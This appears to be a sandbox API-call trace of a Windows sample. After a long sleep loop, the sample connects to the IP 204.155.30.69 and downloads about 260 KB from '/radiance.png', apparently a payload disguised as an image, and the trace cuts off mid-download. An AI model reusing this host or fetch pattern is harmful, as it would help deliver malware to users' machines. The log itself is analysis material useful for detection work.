	[0232.565] GetLastError () returned 0x0
	[0232.565] Sleep (dwMilliseconds=0x1) 
	[0232.582] GetLastError () returned 0x0
	[0232.582] Sleep (dwMilliseconds=0x1) 
	[0232.597] GetLastError () returned 0x0
	[0232.597] Sleep (dwMilliseconds=0x1) 
	[0232.612] GetLastError () returned 0x0
	[0232.612] Sleep (dwMilliseconds=0x1) 
	[0232.628] GetLastError () returned 0x0
	[0232.628] Sleep (dwMilliseconds=0x1) 
	[0232.643] GetLastError () returned 0x0
	[0232.644] Sleep (dwMilliseconds=0x1) 
	[0232.659] GetLastError () returned 0x0
	[0232.659] Sleep (dwMilliseconds=0x1) 
	[0232.674] GetLastError () returned 0x0
	[0232.674] Sleep (dwMilliseconds=0x1) 
	[0232.691] GetLastError () returned 0x0
	[0232.691] Sleep (dwMilliseconds=0x1) 
	[0232.706] GetLastError () returned 0x0
	[0232.706] Sleep (dwMilliseconds=0x1) 
	[0232.721] GetLastError () returned 0x0
	[0232.721] Sleep (dwMilliseconds=0x1) 
	[0232.737] GetLastError () returned 0x0
	[0232.737] Sleep (dwMilliseconds=0x1) 
	[0232.753] GetLastError () returned 0x0
	[0232.753] Sleep (dwMilliseconds=0x1) 
	[0232.768] GetLastError () returned 0x0
	[0232.768] Sleep (dwMilliseconds=0x1) 
	[0232.784] GetLastError () returned 0x0
	[0232.784] Sleep (dwMilliseconds=0x1) 
	[0232.799] GetLastError () returned 0x0
	[0232.799] Sleep (dwMilliseconds=0x1) 
	[0232.815] GetLastError () returned 0x0
	[0232.815] Sleep (dwMilliseconds=0x1) 
	[0232.831] GetLastError () returned 0x0
	[0232.831] Sleep (dwMilliseconds=0x1) 
	[0232.846] GetLastError () returned 0x0
	[0232.846] Sleep (dwMilliseconds=0x1) 
	[0232.862] GetLastError () returned 0x0
	[0232.862] Sleep (dwMilliseconds=0x1) 
	[0232.878] GetLastError () returned 0x0
	[0232.878] Sleep (dwMilliseconds=0x1) 
	[0232.893] GetLastError () returned 0x0
	[0232.894] Sleep (dwMilliseconds=0x1) 
	[0232.909] GetLastError () returned 0x0
	[0232.909] Sleep (dwMilliseconds=0x1) 
	[0232.925] GetLastError () returned 0x0
	[0232.925] Sleep (dwMilliseconds=0x1) 
	[0232.956] GetLastError () returned 0x0
	[0232.956] Sleep (dwMilliseconds=0x1) 
	[0232.971] GetLastError () returned 0x0
	[0232.971] Sleep (dwMilliseconds=0x1) 
	[0232.986] GetLastError () returned 0x0
	[0232.986] Sleep (dwMilliseconds=0x1) 
	[0233.002] GetLastError () returned 0x0
	[0233.002] Sleep (dwMilliseconds=0x1) 
	[0233.018] GetLastError () returned 0x0
	[0233.018] Sleep (dwMilliseconds=0x1) 
	[0233.033] GetLastError () returned 0x0
	[0233.033] Sleep (dwMilliseconds=0x1) 
	[0233.049] GetLastError () returned 0x0
	[0233.049] Sleep (dwMilliseconds=0x1) 
	[0233.065] GetLastError () returned 0x0
	[0233.065] Sleep (dwMilliseconds=0x1) 
	[0233.080] GetLastError () returned 0x0
	[0233.080] Sleep (dwMilliseconds=0x1) 
	[0233.096] GetLastError () returned 0x0
	[0233.096] Sleep (dwMilliseconds=0x1) 
	[0233.112] GetLastError () returned 0x0
	[0233.112] Sleep (dwMilliseconds=0x1) 
	[0233.128] GetLastError () returned 0x0
	[0233.128] Sleep (dwMilliseconds=0x1) 
	[0233.143] GetLastError () returned 0x0
	[0233.143] Sleep (dwMilliseconds=0x1) 
	[0233.159] GetLastError () returned 0x0
	[0233.159] Sleep (dwMilliseconds=0x1) 
	[0233.174] GetLastError () returned 0x0
	[0233.174] Sleep (dwMilliseconds=0x1) 
	[0233.194] GetLastError () returned 0x0
	[0233.194] Sleep (dwMilliseconds=0x1) 
	[0233.205] GetLastError () returned 0x0
	[0233.205] Sleep (dwMilliseconds=0x1) 
	[0233.221] GetLastError () returned 0x0
	[0233.221] Sleep (dwMilliseconds=0x1) 
	[0233.237] GetLastError () returned 0x0
	[0233.237] Sleep (dwMilliseconds=0x1) 
	[0233.252] GetLastError () returned 0x0
	[0233.252] Sleep (dwMilliseconds=0x1) 
	[0233.267] GetLastError () returned 0x0
	[0233.267] Sleep (dwMilliseconds=0x1) 
	[0233.283] GetLastError () returned 0x0
	[0233.283] Sleep (dwMilliseconds=0x1) 
	[0233.298] GetLastError () returned 0x0
	[0233.299] Sleep (dwMilliseconds=0x1) 
	[0233.314] GetLastError () returned 0x0
	[0233.314] Sleep (dwMilliseconds=0x1) 
	[0233.365] GetLastError () returned 0x0
	[0233.365] Sleep (dwMilliseconds=0x1) 
	[0233.376] GetLastError () returned 0x0
	[0233.376] Sleep (dwMilliseconds=0x1) 
	[0233.392] GetLastError () returned 0x0
	[0233.392] Sleep (dwMilliseconds=0x1) 
	[0233.408] GetLastError () returned 0x0
	[0233.408] Sleep (dwMilliseconds=0x1) 
	[0233.423] GetLastError () returned 0x0
	[0233.423] Sleep (dwMilliseconds=0x1) 
	[0233.439] GetLastError () returned 0x0
	[0233.440] Sleep (dwMilliseconds=0x1) 
	[0233.455] GetLastError () returned 0x0
	[0233.455] Sleep (dwMilliseconds=0x1) 
	[0233.470] GetLastError () returned 0x0
	[0233.470] Sleep (dwMilliseconds=0x1) 
	[0233.486] GetLastError () returned 0x0
	[0233.486] Sleep (dwMilliseconds=0x1) 
	[0233.501] GetLastError () returned 0x0
	[0233.501] Sleep (dwMilliseconds=0x1) 
	[0233.517] GetLastError () returned 0x0
	[0233.517] Sleep (dwMilliseconds=0x1) 
	[0233.532] GetLastError () returned 0x0
	[0233.532] Sleep (dwMilliseconds=0x1) 
	[0233.548] GetLastError () returned 0x0
	[0233.548] Sleep (dwMilliseconds=0x1) 
	[0233.564] GetLastError () returned 0x0
	[0233.564] WinHttpConnect (hSession=0xe3cc8, pswzServerName="204.155.30.69", nServerPort=0x0, dwReserved=0x0) returned 0xf3920
	[0233.569] WinHttpOpenRequest (hConnect=0xf3920, pwszVerb=0x0, pwszObjectName="/radiance.png", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0xf3b98
	[0233.569] WinHttpSendRequest (hRequest=0xf3b98, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0233.984] WinHttpReceiveResponse (hRequest=0xf3b98, lpReserved=0x0) returned 1
	[0233.984] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0xee8) returned 1
	[0233.984] RtlAllocateHeap (HeapHandle=0x1790000, Flags=0x8, Size=0xee8) returned 0x188e788
	[0233.984] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x188e788, dwNumberOfBytesToRead=0xee8, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x188e788*, lpdwNumberOfBytesRead=0x5bfd9c*=0xee8) returned 1
	[0233.985] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0233.985] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x188e788, Size=0x2ee8) returned 0x180f578
	[0233.985] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1810460, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1810460*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0233.986] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x328) returned 1
	[0233.986] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x3210) returned 0x180f578
	[0233.986] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1812460, dwNumberOfBytesToRead=0x328, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1812460*, lpdwNumberOfBytesRead=0x5bfd9c*=0x328) returned 1
	[0233.986] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0xea8) returned 1
	[0234.187] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x40b8) returned 0x180f578
	[0234.187] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1812788, dwNumberOfBytesToRead=0xea8, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1812788*, lpdwNumberOfBytesRead=0x5bfd9c*=0xea8) returned 1
	[0234.188] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.189] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x60b8) returned 0x180f578
	[0234.189] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1813630, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1813630*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.189] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.190] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x80b8) returned 0x180f578
	[0234.190] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1815630, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1815630*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.190] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.191] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0xa0b8) returned 0x180f578
	[0234.191] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1817630, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1817630*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.191] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2c8) returned 1
	[0234.191] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0xa380) returned 0x180f578
	[0234.191] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1819630, dwNumberOfBytesToRead=0x2c8, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1819630*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2c8) returned 1
	[0234.191] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0xea8) returned 1
	[0234.392] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0xb228) returned 0x180f578
	[0234.392] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18198f8, dwNumberOfBytesToRead=0xea8, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18198f8*, lpdwNumberOfBytesRead=0x5bfd9c*=0xea8) returned 1
	[0234.392] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.393] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0xd228) returned 0x180f578
	[0234.393] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x181a7a0, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x181a7a0*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.393] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.394] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0xf228) returned 0x180f578
	[0234.394] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x181c7a0, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x181c7a0*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.395] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.395] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x11228) returned 0x180f578
	[0234.395] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x181e7a0, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x181e7a0*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.395] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.396] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x13228) returned 0x180f578
	[0234.396] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18207a0, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18207a0*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.396] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x1b80) returned 1
	[0234.397] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x14da8) returned 0x180f578
	[0234.397] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18227a0, dwNumberOfBytesToRead=0x1b80, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18227a0*, lpdwNumberOfBytesRead=0x5bfd9c*=0x1b80) returned 1
	[0234.397] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x1c5c) returned 1
	[0234.398] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x16a04) returned 0x180f578
	[0234.398] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1824320, dwNumberOfBytesToRead=0x1c5c, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1824320*, lpdwNumberOfBytesRead=0x5bfd9c*=0x1c5c) returned 1
	[0234.398] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.399] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x18a04) returned 0x180f578
	[0234.399] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1825f7c, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1825f7c*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.399] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x208) returned 1
	[0234.399] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x18c0c) returned 0x180f578
	[0234.399] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1827f7c, dwNumberOfBytesToRead=0x208, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1827f7c*, lpdwNumberOfBytesRead=0x5bfd9c*=0x208) returned 1
	[0234.399] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.599] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x1ac0c) returned 0x180f578
	[0234.599] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1828184, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1828184*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.599] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.600] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x1cc0c) returned 0x180f578
	[0234.600] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x182a184, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x182a184*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.600] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.601] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x1ec0c) returned 0x180f578
	[0234.601] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x182c184, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x182c184*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.601] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.602] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x20c0c) returned 0x180f578
	[0234.602] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x182e184, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x182e184*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.602] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.603] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x22c0c) returned 0x180f578
	[0234.603] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1830184, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1830184*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.603] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.604] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x24c0c) returned 0x180f578
	[0234.604] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1832184, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1832184*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.604] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.604] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x26c0c) returned 0x180f578
	[0234.604] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1834184, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1834184*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.604] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.605] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x28c0c) returned 0x180f578
	[0234.605] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1836184, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1836184*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.605] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x400) returned 1
	[0234.605] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x2900c) returned 0x180f578
	[0234.605] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1838184, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1838184*, lpdwNumberOfBytesRead=0x5bfd9c*=0x400) returned 1
	[0234.605] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.814] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x2b00c) returned 0x180f578
	[0234.814] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1838584, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1838584*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.815] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.815] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x2d00c) returned 0x180f578
	[0234.815] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x183a584, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x183a584*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.815] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.815] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x2f00c) returned 0x180f578
	[0234.815] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x183c584, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x183c584*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.815] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.816] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x3100c) returned 0x180f578
	[0234.816] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x183e584, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x183e584*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.816] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.816] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x3300c) returned 0x180f578
	[0234.816] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1840584, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1840584*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.816] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.816] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x3500c) returned 0x180f578
	[0234.816] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1842584, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1842584*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.816] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.817] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x3700c) returned 0x180f578
	[0234.817] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1844584, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1844584*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.817] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0234.817] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x3900c) returned 0x180f578
	[0234.817] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1846584, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1846584*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0234.817] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x24) returned 1
	[0234.817] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x39030) returned 0x180f578
	[0234.817] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x1848584, dwNumberOfBytesToRead=0x24, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x1848584*, lpdwNumberOfBytesRead=0x5bfd9c*=0x24) returned 1
	[0234.818] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x1c5c) returned 1
	[0235.005] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x3ac8c) returned 0x180f578
	[0235.006] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x18485a8, dwNumberOfBytesToRead=0x1c5c, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x18485a8*, lpdwNumberOfBytesRead=0x5bfd9c*=0x1c5c) returned 1
	[0235.006] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.006] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x3cc8c) returned 0x180f578
	[0235.006] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x184a204, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x184a204*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.006] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.007] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x3ec8c) returned 0x180f578
	[0235.007] WinHttpReadData (in: hRequest=0xf3b98, lpBuffer=0x184c204, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x5bfd9c | out: lpBuffer=0x184c204*, lpdwNumberOfBytesRead=0x5bfd9c*=0x2000) returned 1
	[0235.008] WinHttpQueryDataAvailable (in: hRequest=0xf3b98, lpdwNumberOfBytesAvailable=0x5bfd9c | out: lpdwNumberOfBytesAvailable=0x5bfd9c*=0x2000) returned 1
	[0235.008] RtlReAllocateHeap (Heap=0x1790000, Flags=0x8, Ptr=0x180f578, Size=0x40c8c) returned 0x180f578
